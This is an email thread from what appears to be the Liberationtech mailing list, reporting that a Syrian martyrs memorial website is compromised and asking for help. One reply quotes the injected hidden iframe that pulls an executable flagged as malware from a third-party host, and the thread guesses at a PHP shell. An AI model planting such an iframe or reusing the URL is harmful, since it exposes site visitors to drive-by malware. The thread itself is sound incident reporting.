-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 holly shit:
<iframe name="I1" width="10" height="10" src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"; border="0" frameborder="0"> :/ if you are running windows don't even go there!!! Andrew Lewis: > I can get to this in 6 hours or so, maybe someone is willing to > jump on this before then? > > -Andrew > > On Jan 30, 2013, at 11:06 AM, KheOps <[email protected]> wrote: > >> Dear Libtech, >> >> We just saw that the website : http://www.syrian-martyrs.com is >> probably compromised. Every page of the website contains an >> iFrame which links to a .exe file which is detected as a virus by >> antivirus software: >> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe >> >> >> The fact that the HTML code is present at the bottom of each page makes >> me think that the "index.php" page has been changed in a way that >> makes that iFrame appear on every page of the website, after the >> dynamic content. >> >> It also probably means that the attackers have some kind of >> access to the server. My guess would be going to a PHP shell, but >> I'm no expert in this. >> >> Any help, clue, investigation, would be very welcome :) >> >> Thank you, KheOps >> >> -- Unsubscribe, change to digest, or change password at: >> https://mailman.stanford.edu/mailman/listinfo/liberationtech > -- Unsubscribe, change to digest, or change password at: > https://mailman.stanford.edu/mailman/listinfo/liberationtech > - -- “Be the change you want to see in the world.” Gandhi OTR: [email protected] a5dae15f45a37e9768f6deae7b54807fc4942ec9 -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJRCE3zAAoJEDxieAEiLOmomokQALhspfbV3gILR9uG9+28Fr+a 97driwAkcTGlCRsMuPAGFVeDlVnLo2RmnXj2X3uusEY+uON0zysx0+uhj3+ar5cM MU/Mwg3rytYAY63f2ZKdisTAWZF5FPDF+MMFNhKIG3a/60i/u1F+TP216aEOcHOW y9p79SSMap+YPd31ojPKskY3pz3Jtp5C56lRMFMBdTs2ajVRhSRGK9DA6DyGa/9v nGNkQ6o6HexdLpTKR2VDTpZtRFo8PO8E6ouPB4PCOhEPDw4JfKvu+KOIqAd8WWMl 9i/vgXKQBucQLwm/BgAwP6GrZF8IEOJFPbBVlUSHpKGWQ10mwvREs7x/bzUWWRWq UHeYapCyCRjiaIVw3LTXJ5WPKI08vVqcGE6luQRcCT0ZLB0B6XhQi4Ew1wmI3K+w F2fh5XtdjtSufDmfAaw/QMTOdq3x/iOVSacGX1OmR2Y7On4ZcDIdJZLnhWDVOaUM kfAwmT8mf8d0MAhtv4jhpViHQOeC1HJa7cFUWeeMxhRSr1Zbefvg0m7a6NeYuHPH x2pE3NYI1CdHJ+QYiWbrcFKEfftdQvDBqSaD9ED1vfjRwD/y6tHDxCIsutUl4KcR hqplw+9YX4HdElXAK5RldfXG2QCrfpQZNIi/OBWwH+etTfTBYd/F86IQGg/cJLj8 To0sHyoZUxuAoLQFUczz =w6gN -----END PGP SIGNATURE----- -- Unsubscribe, change to digest, or change password at: https://mailman.stanford.edu/mailman/listinfo/liberationtech
